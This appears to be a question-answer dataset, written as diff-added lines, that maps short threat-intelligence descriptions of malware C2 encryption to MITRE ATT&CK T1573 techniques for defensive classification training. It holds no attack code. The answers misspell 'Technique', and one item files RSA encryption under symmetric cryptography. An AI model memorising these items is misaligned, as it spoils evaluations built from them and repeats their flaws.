+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can encrypt C2 communications.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowGoop can receive encrypted commands from C2.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerLess can use an encrypted channel for C2 communications.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can use an encrypted beacon to check in with C2.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has encrypted TCP communications to evade detection.,"Tecnique: T1573 Encrypted Channel, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors communicated with C2 via an encrypted RC4 byte stream and AES-CBC.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used an AES key to communicate with their C2 server.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 installed a Delphi backdoor that used a custom algorithm for C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used AES for encryption of command and control traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic. BRONZE BUTLER has also used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has used AES-256 and 3DES for C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used AES-128 to encrypt C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has encrypted network communications with AES.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used AES to encrypt C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used AES to encrypt C2 responses.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has encrypted C2 communications with RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware encrypts C2 traffic using RC4 with a hard-coded key.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used a version of the Awen web shell that employed AES encryption and decryption for C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used AES encrypted communications in C2.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: 3PARA RAT command and control commands are encrypted within the HTTP C2 channel using the DES algorithm in CBC mode with a key derived from the MD5 hash of the string HYF54&%9&jkMCXuiS. 3PARA RAT will use an 8-byte XOR key derived from the string HYF54&%9&jkMCXuiS if the DES decoding fails,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: 4H RAT obfuscates C2 communication using a 1-byte XOR with the key 0xBE.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A variant of ADVSTORESHELL encrypts some C2 with 3DES.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can encrypt C2 traffic using XOR.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADCALL encrypts C2 traffic using an XOR/ADD cipher.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS encrypts C2 data with a ROR by 3 and an XOR by 0x23.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT uses a custom encryption algorithm on data sent back to the C2 server over HTTP.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has encrypted its C2 traffic with RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has used AES encryption for C2 communication.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can send C2 communications with XOR encryption.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BendyBear communicates to a C2 server over port 443 using modified RC4 and XOR-encrypted chunks.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some Bisonal samples encrypt C2 communications with RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bonadan can XOR-encrypt C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can encrypt C2 requests and responses with RC4,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK encrypts C2 communications with RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORESHELL C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CallMe uses AES to encrypt C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak encrypts the message body of HTTP traffic with RC2 (in CBC mode). Carbanak also uses XOR with random keys for its communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT uses a secret key with a series of XOR and addition operations to encrypt C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes can encrypt C2 traffic with AES or RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can send additional modules over C2 encrypted with a simple substitution cipher.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie encrypts command and control communications with RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke contains a custom version of the RC4 algorithm that includes a programming error.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf uses RC4 encryption to obfuscate HTTP traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi obfuscates C2 traffic with variable 4-byte XOR keys.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dipsind encrypts C2 data with AES256 in ECB mode.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Downdelph uses RC4 to encrypt C2 responses.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex has encrypted traffic with RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Duqu command and control protocol's data stream can be encrypted with AES-CBC.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise encrypts exfiltrated data with RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The C2 server response to a beacon sent by a variant of Emissary contains a 36-character GUID value that is used as an encryption key for subsequent network communications. Some variants of Emissary use various XOR operations to encrypt C2 data.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic encrypts commands from the C2 server using a hardcoded key.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive has encrypted communications with the RC4 method.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FALLCHILL encrypts C2 data with RC4 encryption.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The original variant of FakeM encrypts C2 traffic using a custom encryption cipher that uses an XOR key of “YHCRA” and bit rotation between each XOR operation. Some variants of FakeM use RC4 to encrypt C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can AES encrypt C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Felismus samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy has used SEAL encryption during the initial C2 handshake.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb has used a dynamic XOR key and custom XOR methodology for C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer uses custom encryption for C2 that uses 3DES.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy encrypts communications using AES256.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can use an AES key to encrypt C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 encrypts C2 traffic using an RC4 key.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Before being appended to image files, HAMMERTOSS commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth encrypts data sent to its C2 server over HTTP with RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hi-Zor encrypts C2 traffic with a double XOR using two distinct single-byte keys.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HiddenWasp uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hikit performs XOR encryption.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has compressed network communications and encrypted them with a custom stream cipher.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq C2 traffic is encrypted using bitwise NOT and XOR operations.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperStack has used RSA encryption for C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The IceApple Result Retriever module can AES encrypt C2 responses.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole uses variations of a simple XOR encryption routine for C&C communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYMARBLE uses a customized XOR algorithm to encrypt C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has used AES to encrypt C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos's post-authentication communication channel uses a 32-byte-long password with RC4 for inbound and outbound traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Komplex C2 channel uses an 11-byte XOR algorithm to hide data.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LIGHTWIRE can RC4 encrypt C2 commands.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron uses AES to encrypt C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack uses a modified version of RC4 for data transfer.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can perform a decremental-xor encryption on the initial C2 request before sending it over the wire.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lurid performs XOR encryption.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has used AES to exfiltrate documents.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can encrypt its C2 traffic with RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has encrypted C2 commands with AES-256.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall has the ability to RC4 encrypt C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind encrypts C2 traffic using RC4 with a static key.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs has used an RC4-based encryption method for its C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NDiskMonitor uses AES to encrypt certain information sent over its C2 channel.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETEAGLE will decrypt resources it downloads with HTTP requests by using RC4 with the key ""ScoutEagle.""","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can use AES encryption for C2 data transferred.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NGLite will use an AES encrypted channel for command and control purposes, in one case using the key WHATswrongwithUu.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore uses DES to encrypt the C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae can use RC4 and XOR to encrypt C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can XOR and AES encrypt C2 messages.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D encrypts data sent back to the C2 using AES in CBC mode with a null initialization vector (IV) and a key sent from the server that is padded to 32 bytes.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum uses AES to encrypt network traffic. The key can be hardcoded or negotiated with the C2 server in the registration phase.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLAINTEE encodes C2 beacons using XOR.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has used RC4 encryption to download modules.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERTON has used AES for encrypting C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora has the ability to encrypt communications with D3DES.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull can use AES, in cipher block chaining (CBC) mode padded with PKCS5, to encrypt C2 server communications.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon communications are RC4 encrypted.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX can use RC4 encryption in C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy uses the Camellia cipher to encrypt communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prikormka encrypts some C2 traffic with the Blowfish cipher.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETCANARY can RC4 encrypt C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can RC4 encrypt strings in C2 communication.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT uses AES with a hardcoded pre-shared key to encrypt network communication.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT has used AES ciphertext to encode C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT12 has used the RIPTIDE RAT, which communicates over HTTP with a payload encrypted with RC4.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM encrypts C2 traffic with a custom RC4 variant.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use RC4 to encrypt C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rifdoor has encrypted command and control (C2) communications with a stream cipher.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RotaJakiro encrypts C2 communication using a combination of AES, XOR, ROTATE encryption, and ZLIB compression.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLIGHTPULSE can RC4 encrypt all incoming and outgoing C2 messages.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has encrypted its C2 traffic with RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SNUGRIDE encrypts C2 traffic using AES with a static key.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST encrypted C2 traffic using a single-byte-XOR cipher.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sakula encodes C2 traffic with single-byte XOR keys.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can encrypt C2 communications with AES.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to use an RC4 key to encrypt communications to and from actor-controlled C2 servers.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke C2 traffic has been encrypted with RC4 and AES.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist can encrypt C2 communications with a randomly generated key.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can use AES-GCM-256 to encrypt a session key for C2 message exchange.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SodaMaster can use RC4 to encrypt C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
